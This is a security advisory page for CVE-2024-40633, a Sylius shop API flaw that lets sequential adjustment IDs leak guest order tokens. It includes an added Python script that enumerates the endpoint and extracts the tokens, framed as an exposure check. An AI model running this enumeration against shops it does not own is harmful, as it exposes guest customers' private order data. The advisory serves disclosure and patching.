VYPR
Medium severity (5.3) · OSV Advisory · Published Jul 17, 2024 · Updated Apr 15, 2026

CVE-2024-40633

Description

Sylius is an Open Source eCommerce Framework on Symfony. A security vulnerability was discovered in the /api/v2/shop/adjustments/{id} endpoint, which retrieves order adjustments by incremental integer ID. The vulnerability allows an attacker to enumerate valid adjustment IDs and retrieve order tokens. Using these tokens, an attacker can access guest customer order details, which contain sensitive guest customer information. The issue is fixed in versions 1.12.19, 1.13.4 and above, where the /api/v2/shop/adjustments/{id} endpoint always returns a 404 status. Users are advised to upgrade. Users unable to upgrade may alter their config to mitigate this issue. Please see the linked GHSA for details.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

The Sylius eCommerce framework exposes a shop API endpoint that returns order adjustments by incremental integer ID, allowing an unauthenticated attacker to enumerate adjustments, obtain guest order tokens and read sensitive customer order details.

The vulnerability resides in the /api/v2/shop/adjustments/{id} endpoint of Sylius, an open-source eCommerce framework built on Symfony [1]. The endpoint uses incremental integer IDs to retrieve order adjustments. An attacker can exploit this predictable ID pattern to enumerate valid adjustment IDs and extract associated order tokens [3].

No special privileges are required; the endpoint is publicly accessible in the shop API [2]. By sending sequential requests to /api/v2/shop/adjustments/{id}, an attacker can discover valid adjustment IDs and retrieve the corresponding order tokens [1]. Because a guest order is addressed by its token rather than by a customer account, the harvested token is all that is needed to read the guest customer's order details without authenticating as that customer [3].

The impact is information disclosure: an attacker can obtain sensitive guest customer information, including order details, by leveraging the enumerated tokens [1]. This compromises the confidentiality of guest customer data in the eCommerce platform [3].

The issue is patched in Sylius versions 1.12.19 and 1.13.4, where the endpoint is disabled and always returns a 404 status [2][3]. Users unable to upgrade can apply a configuration workaround by overriding the endpoint to use ApiPlatform\Core\Action\NotFoundAction, as detailed in the advisory [3].

AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
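The mechanics described above, as an added check written for this page (example code, not Sylius project code): walk sequential adjustment IDs, classify each response, and distinguish the vulnerable behaviour (2xx responses that carry an order token) from the patched behaviour (a constant 404). The only facts taken from the advisory are the endpoint path, the incremental IDs and the always-404 fix; the JSON key names (`order`, `tokenValue`, `orderToken`), the `/api/v2/shop/orders/<token>` IRI shape and the sample responses are assumptions constructed here, and `live_fetcher` is a hypothetical helper for probing a shop you are authorised to test.

```python
"""Offline check for the CVE-2024-40633 exposure pattern (added example).

Facts from the advisory: vulnerable Sylius builds answer
GET /api/v2/shop/adjustments/{id} for sequential integer ids and the
response leads to an order token; patched builds (1.12.19 / 1.13.4 and
later) answer 404 for every id. Everything else below is assumed.
"""
import json
import re
from dataclasses import dataclass
from typing import Callable, List, Optional, Tuple

ADJUSTMENT_PATH = "/api/v2/shop/adjustments/{id}"
# Assumed shape of the order reference inside an adjustment payload.
ORDER_IRI = re.compile(r"^/api/v2/shop/orders/(?P<token>[^/]+)$")
TOKEN_KEYS = ("tokenValue", "orderToken")  # assumed key names, not from the page


@dataclass
class Probe:
    adjustment_id: int
    status: int
    token: Optional[str] = None


def extract_token(body: object) -> Optional[str]:
    """Depth-first walk of a decoded JSON body; return the first token-like value."""
    if isinstance(body, dict):
        for key, value in body.items():
            if key in TOKEN_KEYS and isinstance(value, str):
                return value
            if key == "order" and isinstance(value, str):
                match = ORDER_IRI.match(value)
                if match:
                    return match.group("token")
            found = extract_token(value)
            if found:
                return found
    elif isinstance(body, list):
        for item in body:
            found = extract_token(item)
            if found:
                return found
    return None


def classify(adjustment_id: int, status: int, raw_body: bytes) -> Probe:
    """404 is the patched behaviour; any 2xx means the item operation is still
    enabled, and a token in the body means the full CVE-2024-40633 chain works."""
    token = None
    if 200 <= status < 300:
        try:
            token = extract_token(json.loads(raw_body))
        except ValueError:  # non-JSON body: endpoint enabled, but nothing to harvest
            token = None
    return Probe(adjustment_id, status, token)


def enumerate_adjustments(fetch: Callable[[int], Tuple[int, bytes]],
                          start: int = 1, stop_after_misses: int = 50,
                          limit: int = 10_000) -> List[Probe]:
    """Sequential-id walk as the advisory describes. Ids are incremental, so a
    long run of non-2xx answers means we have passed the last adjustment."""
    hits: List[Probe] = []
    misses = 0
    for adjustment_id in range(start, start + limit):
        status, body = fetch(adjustment_id)
        probe = classify(adjustment_id, status, body)
        if 200 <= status < 300:
            hits.append(probe)
            misses = 0
        else:
            misses += 1
            if misses >= stop_after_misses:
                break
    return hits


def verdict(probes: List[Probe]) -> str:
    if not probes:
        return "not exposed: every probed id returned non-2xx (patched builds always answer 404)"
    if any(p.token for p in probes):
        return "VULNERABLE: adjustment ids enumerable and order tokens present in responses"
    return "endpoint enabled: ids enumerable, no token field recognised (inspect the body manually)"


# Constructed sample responses (not captured from a real shop).
VULNERABLE_SHOP = {
    1: (200, b'{"@id": "/api/v2/shop/adjustments/1", "id": 1, "type": "shipping", '
             b'"amount": 500, "order": "/api/v2/shop/orders/abc123tokenXYZ"}'),
    3: (200, b'{"id": 3, "type": "tax", "amount": 120, '
             b'"order": "/api/v2/shop/orders/def456tokenUVW"}'),
}


def fake_vulnerable(adjustment_id: int) -> Tuple[int, bytes]:
    return VULNERABLE_SHOP.get(adjustment_id, (404, b"{}"))


def fake_patched(adjustment_id: int) -> Tuple[int, bytes]:
    return 404, b'{"@type": "hydra:Error", "title": "An error occurred", "detail": "Not Found"}'


def live_fetcher(base_url: str, timeout: float = 10.0) -> Callable[[int], Tuple[int, bytes]]:
    """Hypothetical helper: only use against a shop you are authorised to test."""
    import urllib.error
    import urllib.request

    def fetch(adjustment_id: int) -> Tuple[int, bytes]:
        url = base_url.rstrip("/") + ADJUSTMENT_PATH.format(id=adjustment_id)
        try:
            with urllib.request.urlopen(url, timeout=timeout) as resp:
                return resp.status, resp.read()
        except urllib.error.HTTPError as err:
            return err.code, err.read()
    return fetch


if __name__ == "__main__":
    for name, fetcher in (("vulnerable", fake_vulnerable), ("patched", fake_patched)):
        hits = enumerate_adjustments(fetcher, stop_after_misses=5, limit=20)
        print(f"{name}: {len(hits)} hit(s); {verdict(hits)}")
```

The stop-after-misses heuristic matters for a real probe: adjustment IDs are incremental but sparse (deleted carts leave gaps), so a single 404 is not evidence of the patch, whereas a patched build yields no 2xx at all over any window. Swap `fake_vulnerable` for `live_fetcher("https://shop.example")` to run the same walk against a deployment you own.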

Affected packages

Versions sourced from the GitHub Security Advisory.

Package        Ecosystem   Affected versions               Patched version
sylius/sylius  Packagist   < 1.9.12                        1.9.12
sylius/sylius  Packagist   >= 1.10.0-alpha.1, < 1.10.16    1.10.16
sylius/sylius  Packagist   >= 1.11.0-alpha.1, < 1.11.17    1.11.17
sylius/sylius  Packagist   >= 1.12.0-alpha.1, < 1.12.19    1.12.19
sylius/sylius  Packagist   >= 1.13.0-alpha.1, < 1.13.4     1.13.4

Affected products: 1

Patches: 2


References: 4

News mentions: 0